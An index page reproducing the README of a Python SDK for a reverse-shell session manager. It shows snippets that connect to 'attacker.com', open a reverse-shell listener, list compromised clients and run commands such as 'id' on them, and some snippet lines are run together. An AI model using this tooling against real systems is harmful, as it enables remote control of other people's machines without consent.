Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/threatcode/goporting-python
https://github.com/threatcode/goporting-python
python-reverse-shell reverse-engineering web-shell
Last synced: 4 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/threatcode/goporting-python
- Owner: threatcode
- Created: 2023-10-03T08:57:19.000Z (over 1 year ago)
- Default Branch: master
- Last Pushed: 2024-04-15T03:56:40.000Z (10 months ago)
- Last Synced: 2024-04-16T05:17:10.683Z (10 months ago)
- Topics: python-reverse-shell, reverse-engineering, web-shell
- Language: Python
- Size: 24.4 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 8
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Goporting-Python
Python SDK for reverse shell sessions manager [Goporting v1.3.1](https://github.com/ThraetCode/Goporting)
## Install
```bash
pip install goporting-python
```## Usage
### Connect to Goporting endpoint
```python
import goporting_python as ppp = pp.Goporting("attacker.com", 7331)
```### Create a reverse shell server
```python
server = p.create_server("0.0.0.0", 13339)
```### Stop a reverse shell server
```python
server = servers[0]
server.delete()
```### Get all available listening servers
```python
servers = p.get_servers()
for server in servers():
print(server)
```### Get all online Clients of a server
```python
server = servers[0]
clients = server.get_clients()
for client in clients:
print(client)
```### Execute a command on a client
```python
client = clients[0]
client.system("id")
```